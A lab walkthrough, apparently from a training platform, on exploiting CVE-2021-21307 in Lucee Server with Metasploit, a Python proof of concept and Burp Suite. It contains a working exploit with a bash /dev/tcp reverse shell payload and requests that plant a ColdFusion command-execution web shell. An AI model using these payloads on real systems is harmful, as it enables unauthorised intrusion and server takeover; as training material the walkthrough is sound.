[CVE-2021-21307] Lucee Server Arbitrary File Write
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Purpose:
We are learning how to exploit the Lucee server's vulnerable version using the Metasploit Framework and a Python script.
Technical difficulty: Beginner
Introduction
Lucee Server is a dynamic, Java-based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin, before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there was an unauthenticated, remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
This vulnerability has been assigned the CVE id CVE-2021-21307. The Base CVSS score for this vulnerability is 9.8 Critical.
Reference: https://nvd.nist.gov/vuln/detail/CVE-2021-21307
The idea is to take advantage of an arbitrary file written in Lucee Administrator's imgProcess.cfm file.
In this lab, we will learn how to exploit the unauthenticated, remote code execution vulnerability in Lucee Administrator in a realistic environment and leverage it to gain shell access on the target server and retrieve the flag!
Lab Environment
In this lab environment, the user is going to get access to a Kali GUI instance. A vulnerable version of Lucee is running on the target machine. It can be accessed using the tools installed on Kali at http://demo.ine.local:8888.
Objective: Exploit the unauthenticated remote code execution (RCE) vulnerability in Lucee Admin to gain shell access on the target server and retrieve the flag present in the system's root directory!
Tools
The best tools for this lab are:
- Nmap
- Curl
- Python
- A web browser
- Metasploit Framework
Step 1: Open the lab link to access the Kali GUI instance.
Step 2: Check if the provided machine/domain is reachable.
Command:
ping -c3 demo.ine.local
The provided machine is reachable. 192.52.49.3 is the IP address of the target machine.
Step 3: Check open ports on the provided machine.
Command:
nmap -sS -sV demo.ine.local
Apache Tomcat 9.0.39 is running on port 8888 on the target machine.
Step 4: Let's try sending a bad request using the browser.
Command:
http://demo.ine.local:8888/hdshgss.cfm
We notice that a vulnerable Lucee 5.3.7.43 is running on the target machine.
Exploit using the Metasploit module
Step 5: First, check the attacker machine's IP address.
Command:
ifconfig
192.52.49.2 is the attacker machine's IP address.
Step 6: Start the msfconsole and search for the desired module.
Commands:
msfconsole -q
search lucee
Step 7: We get the desired module. We will use this module and then see what all options are required. Run the following commands:
Commands:
use exploit/linux/http/lucee_admin_imgprocess_file_write
show options
Step 8: Now run the following commands one by one:
Commands:
set RHOSTS 192.52.49.3
set LHOST 192.52.49.2
check
exploit
Note that RHOSTS is the target machine's IP address and LHOST is the attacker machine's IP address. And these values may vary for you.
We have successfully gained a command shell session.
Step 9: Read the flag.
Commands:
ls /
cat /flag.txt
FLAG: 7c5886ace9309cf2d23e6f556c79aa69
Exploit using Python script
We will use the script available at the following URL:
URL: https://github.com/cyllective/CVEs/blob/master/CVE-2021-21307/poc.py
The exploit has been provided by [cyllective](https://github.com/cyllective).
Step 10: From the terminal, save the following python code in a file named exploit.py.
#!/usr/bin/env python3
#
Title: Remote Code Exploit in Lucee Admin
CVE: CVE-2021-21307
Affected: < 5.3.7.47
Software: lucee/Lucee
Research:
* rootxharsh
* iamnoooob
PoC: cydave of cyllective AG
References:
* https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
* https://github.com/advisories/GHSA-wq6x-g685-w5f2
#
import string
import random
import argparse
import requests
import urllib3
Disable insecure https warnings (for self-signed SSL certificates)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ap = argparse.ArgumentParser()
ap.add_argument("-t", "--target", default="http://localhost:8888")
ap.add_argument("-s", "--host", required=True)
ap.add_argument("-p", "--port", required=True, type=int)
args = ap.parse_args()
base_url = args.target.rstrip("/")
def random_string():
return "".join(random.choices(string.ascii_lowercase, k=12))
payload = f"""\
<cfset args="-c 'bash -i >& /dev/tcp/{args.host}/{args.port} 0>&1'">
<cfoutput>
<cfexecute
name="bash"
arguments="#preservesinglequotes(args)#"
timeout="2">
</cfexecute>
</cfoutput>
"""
with requests.Session() as session:
img_process_url = f"{base_url}/lucee/admin/imgProcess.cfm"
response = session.get(img_process_url)
if response.ok:
print(f"[-] Target most likely not vulnerable.")
exit()
filename = random_string() + ".cfm"
print(f"[*] Writing payload...")
session.post(f"{img_process_url}?file=_/" + random_string(), data={"imgSrc": random_string()})
session.post(f"{img_process_url}?file=_/../../../context/{filename}", data={"imgSrc": payload})
try:
print("[*] Triggering shell...")
session.get(f"{base_url}/lucee/{filename}", timeout=2)
except requests.ReadTimeout:
passCheck what arguments are required:
Command:
python3 exploit.py -h
Step 11: Open a second terminal and start a netcat listener on port 5555.
Command:
nc -nvlp 5555
Step 12: From the first terminal, run the script along with the required arguments:
Command:
python3 exploit.py -t http://demo.ine.local:8888 -s 192.52.49.2 -p 5555
Note: Remember to change the host IP address (attacker machine's IP address) in the above command as it may vary for you.
Step 13: Check the second terminal. The exploit worked and we got shell access.
Step 14: Read the flag.
Commands:
ls /
cat /flag.txt
FLAG: 7c5886ace9309cf2d23e6f556c79aa69
Exploit using Burp Suite
Reference: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21307.yaml
Step 15: Start Burp Suite, go to the Repeater tab and paste the following HTTP request. This request will create a directory in */opt/lucee/web/temp/admin-ext-thumbnails* to ensure path traversal.
Request
POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
Host: demo.ine.local:8888
Content-Type: application/x-www-form-urlencoded
imgSrc=a
Step 16: Click on the pencil icon on the top right corner to configure target details as shown.
- Host: demo.ine.local
- Port: 8888
Click OK and then hit Send.
Step 17: Replace the request in the repeater with the following and then hit Send. This request will create our malicious randomfile.cfm.
Request
POST /lucee/admin/imgProcess.cfm?file=/../../../context/randomfile.cfm HTTP/1.1
Host: demo.ine.local:8888
Content-Type: application/x-www-form-urlencoded
imgSrc=
<cfoutput>
<table>
<form method="POST" action="">
<tr><td>Command:</td><td><input type=test name="cmd" size=50
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text name="opts" size=50
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse> value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</form>
<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#HTMLCodeFormat(myVar)#
</pre>
</cfif>
</cfoutput>
Step 18: Now, let's try executing a command. Replace the request in the repeater with the following.
Request
POST /lucee/randomfile.cfm HTTP/1.1
Host: demo.ine.local:8888
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
cmd=id&opts=&timeout=5
We are trying to execute the id command here. Hit Send. The exploit worked, and we got a valid response.
Conclusion
In this lab, we exploited the unauthenticated, remote code execution vulnerability in Lucee Admin using the Metasploit module, Python script, and Burp Suite.
References
- PoC
Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
